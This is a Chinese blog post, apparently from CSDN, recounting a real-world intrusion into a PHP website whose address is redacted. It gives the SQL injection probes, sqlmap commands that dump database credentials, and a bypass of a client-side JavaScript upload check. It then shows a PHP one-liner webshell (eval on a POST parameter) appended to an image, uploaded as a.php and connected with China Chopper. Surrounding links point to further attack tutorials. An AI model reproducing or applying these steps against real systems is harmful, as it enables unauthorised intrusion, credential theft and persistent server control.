记录一次实战,注入+本地JS绕过拿shell

最新推荐文章于 2022-06-27 14:02:24 发布
最新推荐文章于 2022-06-27 14:02:24 发布
阅读量473 收藏 1
点赞数
分类专栏: 渗透 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34341458/article/details/113845203
版权

1.找注入点
在这里插入图片描述
2.测试是否有注入:
http://xxxxxx/xxxx.php?id=6’ ,没有回显
在这里插入图片描述
输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2,没有回显
说明存在注入。
3. 使用sqlmap跑。
sqlmap.py -u “http://xxxxx/xxxx.php?id=6”
在这里插入图片描述
发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。

4.使用御剑扫描后台。然后进行登录。
在这里插入图片描述
我们先上传一个脚本木马试试。
在这里插入图片描述
发现有黑名单。先看下是否是本地js校验。右键
——审查元素,发现是本地js校验。
在这里插入图片描述
我们找到表单form,删除相对应的脚本。
在这里插入图片描述
5.重新上传php一句话,发现
在这里插入图片描述
那么试下图片马
6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>
在这里插入图片描述
在这里插入图片描述
保存,命名为a.php。
然后上传,发现上传成功,使用菜刀连接,密码pw。
在这里插入图片描述

Redamancy——
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Shell脚本一次读取文件中一行的2种写法
09-15
主要介绍了Shell脚本一次读取文件中一行的2种写法,本文还同时讲解了Shell读取文本文件的2种方法,需要的朋友可以参考下
绕过本地的js检查
weixin_33807284的博客
03-20 130
2019独角兽企业重金招聘Python工程师标准>>> ...
小迪教程第十一天——绕过本地端js验证
仲夏
10-22 759
1、一句话图片制作可以利用多种方法在图片里插入可以执行的脚本命令,如php命令,详细方法通过上网查阅2、本地端js验证1、.htaccess 绕过限制上传2、Filetype修改上传 通过抓包修改3、%00截断上传 www.xxx.com/logo.jpg www.xxx.com/logo.php%00.jpg 注意:%00必须采用编码也可以通过禁用本地浏览器的js来实现
js跳转https_从JS敏感信息泄露到GETSHELL
weixin_36424234的博客
12-08 214
亲爱的,关注我吧11/3文章共计742个词预计阅读8分钟来和我一起阅读吧作者:果酸为首的苹果本文转自先知社区:https://xz.aliyun.com/t/8441前言小弟新手,大佬勿喷,文章有何不妥,还望大佬们斧正。正文前端时间打HW,拿到一个IP,先在FOFA上搜一下发现这个IP现在开放了三个端口,分别是86,83,82对应不同的后台管理系统先从86端口这个系统入手,界面如图没有验...
简单的js注入
热门推荐
天才战士的博客
08-16 1万+
个人网站:天才网007
使用 JavaScript 编写 Shell 脚本
祈澈菇凉
06-27 901
作为程序员,在平时的开发中肯定少不了一些命令行操作了。当然,简单的命令大家都是可以拿捏的,但是涉及到一些逻辑的时候还是比较头疼的。ShellShell 是一个用 C 语言编写的程序,它是用户使用 Linux 的桥梁。它既是一种命令语言,又是一种程序设计语言。Shell 脚本(shell script),是一种为 shell 编写的脚本程序,一般文件后缀为 .sh。Shel...
Php手工注入shell详细教程
04-18
Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell...
绕过安全狗Getshell
06-12
详细手把手教你如何绕过安全狗Getshell,新手一学就会
SQL注入绕过 单引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ...
百度批量找注入点拿shell
05-22
百度批量找注入点拿shell
多端口监听代码_powershell代码注入js攻击
weixin_28775337的博客
01-06 149
相信谎言的人必将在真理之前毁灭 —— 赫尔巴特环境攻击机 kali linux(IP地址:192.16896.128)靶机 win7专业版(IP地址192.168.96.130)工具:Pastezort项目地址:https://github.com/ZettaHack/PasteZort下载解压后,打开Pastezort文件夹执行./Pastezort.py选第一项,windows选择payloa...
Zeppelin未授权访问getshell
qq_34341458的博客
04-01 4187
0x01 漏洞简介 Apache Zeppelin是一个让交互式数据分析变得可行的基于网页的notebook。Zeppelin提供了数据可视化的框架。 Zeppelin 是一个提供交互数据分析且基于Web的笔记本。方便你做出可数据驱动的、可交互且可协作的精美文档,并且支持多种语言,包括 Scala(使用 Apache Spark)、Python(Apache Spark)、SparkSQL、 Hive、 Markdown、Shell等等 0x02 影响范围 fofa语句:title=“Zeppelin” 需
ShowDoc文件上传(CNVD-2020-26585)
qq_34341458的博客
04-01 3647
0x01 描述 描述: showdoc一个非常适合IT团队的API文档、技术文档工具。在前台存在文件上传,可以getshell。 0x02 影响范围 fofa搜索语句: app=“ShowDoc” 先访问链接:http://ip:prot/index.php?s=/home/page/uploadImg //文件上传漏洞的链接。如果出现“没有出现上传的文件”,说明可能存在漏洞并可以尝试利用。 0x03 漏洞复现 漏洞地址:http://vulfocus.io/#/dashboard?image_
aspx+mssql网站注入实战
qq_34341458的博客
02-02 1762
aspx网站注入实战 使用谷歌语法:site:. tw inurl:Login.aspx 查找网站 (site是代表国家的代码) 找到网页使用语句测试是否有注入 可能存在注入,使用burpsuit抓登录时的包。 将数据拷贝保存到d:/a.txt内。 使用sqlmap跑包。 sqlmap.py -r d:/a.txt 发现注入 sqlmap.py -r d:/a.txt --dbs 跑数据库 sqlmap.py -r d:/a.txt -D master --tables 跑表 sqlmap
永恒之蓝(MS17010)漏洞复现
qq_34341458的博客
05-07 1719
文章目录介绍:准备开始复现正式开始利用 介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序 准备 1.kali的ip:192.168.0.128 2.WindowsServer
Redis未授权访问及利用复现(保姆级教程)
qq_34341458的博客
08-19 541
文章目录一、简介:二、漏洞影响版本三、漏洞危害四、漏洞环境搭建1. 靶机安装Redis2. kali安装Redis客户端(Redis-cli)五、漏洞复现利用方式11:写入webshell2. 写入一句话利用方式2:通过写入SSH公钥实现SSH登录利用方式3:在crontab里写定时任务,反弹shell参考: 一、简介: Redis 是一个高效的数据库,默认会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公
编辑器漏洞学习笔记
qq_34341458的博客
02-06 465
查找编辑器目录: 目录扫描:御剑 要递归扫描,很多编辑器没有放在根目录,而是放在后台,例:admin/editor,xxx/user/editor 目录遍历: 蜘蛛爬行:aws,爬行菜刀 使用百度:site:xxxx.com inurl:editor/fackeditor/ewebeditor eweb:uploadfiles/2222222.jpg fck: userfiles/zzzzz.jpg 一、FCKeditor编辑器利用 (可能放在根目录或者管理员目录下) 1.编辑器页/版本/文
文件解析漏洞笔记
qq_34341458的博客
02-04 408
一、文件解析漏洞 *解析漏洞主要说的是一些特殊文件被iis、apache、nginx在某种情况下解释成脚本文件格式的漏洞 IIS5.x/6解析利用方法有两种: 1.目录解析 :/xx.asp.jpg 在网站下建立文件夹的名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都被 Is当作asp文件来解析并执行。 例如创建目录cracer.asp,那么 /cracer.asp/1.jpg将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都
python自启动 绕过360_记录一次绕过杀软的过程
最新发布
06-10
首先,需要注意的是,绕过杀软是一种不道德的行为,同时也是违法的。因此,我们不鼓励或支持这种行为。 其次,关于Python自启动,一般有两种方法: 1. 将Python脚本添加到系统的启动项中。这样,每次开机启动时,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值